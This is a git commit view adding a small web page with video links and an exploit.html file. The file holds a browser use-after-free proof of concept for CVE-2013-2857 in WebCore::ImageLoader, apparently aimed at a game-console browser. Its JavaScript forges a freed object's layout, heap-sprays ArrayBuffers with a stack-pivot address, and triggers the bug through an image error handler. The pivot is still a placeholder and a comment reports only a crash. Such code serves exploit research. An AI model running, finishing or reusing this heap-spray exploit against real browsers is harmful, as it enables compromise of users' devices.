Browse Source

Initial commit

Winbagility 1 year ago
commit
6e6d575e06
5 changed files with 75 additions and 0 deletions
  1. BIN
      diibugger.mp4
  2. 64
    0
      exploit.html
  3. BIN
      illuminati.mp4
  4. 11
    0
      index.html
  5. BIN
      tcpgecko.mp4

BIN
diibugger.mp4 View File


+ 64
- 0
exploit.html View File

1
+<!--
2
+Tested on 5.5.1
3
+CVE-2013-2857
4
+Use after free https://bugs.chromium.org/p/chromium/issues/detail?id=240124
5
+Result: Bug is present, crash on what is presumably render
6
+-->
7
+<script>
8
+function UaF(a)
9
+{	
10
+    var pivotAdressAdress       = 0x1B000000; //r6
11
+    var pivotAdress             = 0x41414140; //0x0101cd80; //mr r1,r11; blr
12
+    var sizeWebCoreImageLoader  = 0x18;
13
+    var sprayCount              = 2000;
14
+    var _4K                     = 0x1000;
15
+    
16
+	//radio is the *ONLY* type that left the freed WebCore::ImageLoader free !
17
+    a.type="radio";
18
+	
19
+	//Allocate this new WebCore::ImageLoader over freed WebCore::
20
+    var ab = new ArrayBuffer(sizeWebCoreImageLoader);
21
+    var dv = new DataView(ab)
22
+
23
+    /*
24
+    0:000:x86> dt webkit!WebCore::ImageLoader
25
+       +0x000 __VFN_table : Ptr32 
26
+       +0x004 m_client         : Ptr32 WebCore::ImageLoaderClient
27
+       +0x008 m_image          : WebCore::CachedResourceHandle<WebCore::CachedImage>
28
+       +0x00c m_failedLoadURL  : WTF::AtomicString
29
+       +0x010 m_hasPendingBeforeLoadEvent : Pos 0, 1 Bit
30
+       +0x010 m_hasPendingLoadEvent : Pos 1, 1 Bit
31
+       +0x010 m_hasPendingErrorEvent : Pos 2, 1 Bit
32
+       +0x010 m_imageComplete  : Pos 3, 1 Bit
33
+       +0x010 m_loadManually   : Pos 4, 1 Bit
34
+       +0x010 m_elementIsProtected : Pos 5, 1 Bit
35
+    */
36
+    //Register:r3 Adress:0x1AF35330-0x1AF35360
37
+    dv.setUint32(0x00, 0x41414141);         //vtable
38
+    dv.setUint32(0x04, pivotAdressAdress);  //m_client
39
+    dv.setUint32(0x08, 0x00000000);         //m_image, must be NULL
40
+    dv.setUint32(0x0C, 0x42424242);         //m_failedLoadURL
41
+    dv.setUint32(0x10, 0x43434343);         //m_hasPendingBeforeLoadEvent
42
+    dv.setUint32(0x14, 0x44444444);         //padding
43
+	
44
+    //Spray large ArrayBuffer with pivotAdress	
45
+    //Middle range 0x1B000000
46
+    var ar = new Array(sprayCount);
47
+    for(var i=0; i<sprayCount; i++){
48
+        ar[i] = new DataView(new ArrayBuffer(_4K));
49
+        for(var j=0; j<_4K; j+=4){
50
+            ar[i].setUint32(j, 0x99999999); //filler
51
+        }
52
+        ar[i].setUint32(0x24, pivotAdressAdress);   //lwz r31, 0x24(r6)
53
+                                                    //...
54
+        ar[i].setUint32(0x00, pivotAdressAdress);   //lwz r7, 0x0(r31)
55
+        ar[i].setUint32(0xEC, pivotAdress);         //lwz r9, 0xEC(r7)
56
+    }
57
+    
58
+    
59
+	//Use the new WebCore::ImageLoader & pivot !
60
+	return 0;
61
+}
62
+</script>
63
+
64
+<input id="x" type="image" onerror="UaF(this);" src=""/>

BIN
illuminati.mp4 View File


+ 11
- 0
index.html View File

1
+
2
+<center>
3
+<a href="illuminati.mp4"><h1>Illuminati</h1></a><br/>
4
+<a href="diibugger.mp4"><h1>Diibugger</h1></a><br/>
5
+<a href="exploit.html"><h1>Exploit</h1></a><br/>
6
+<br/>
7
+<br/>
8
+<br/>
9
+<br/>
10
+<a href="tcpgecko.mp4"><h1>TCPGecko</h1></a><br/>
11
+</center>

BIN
tcpgecko.mp4 View File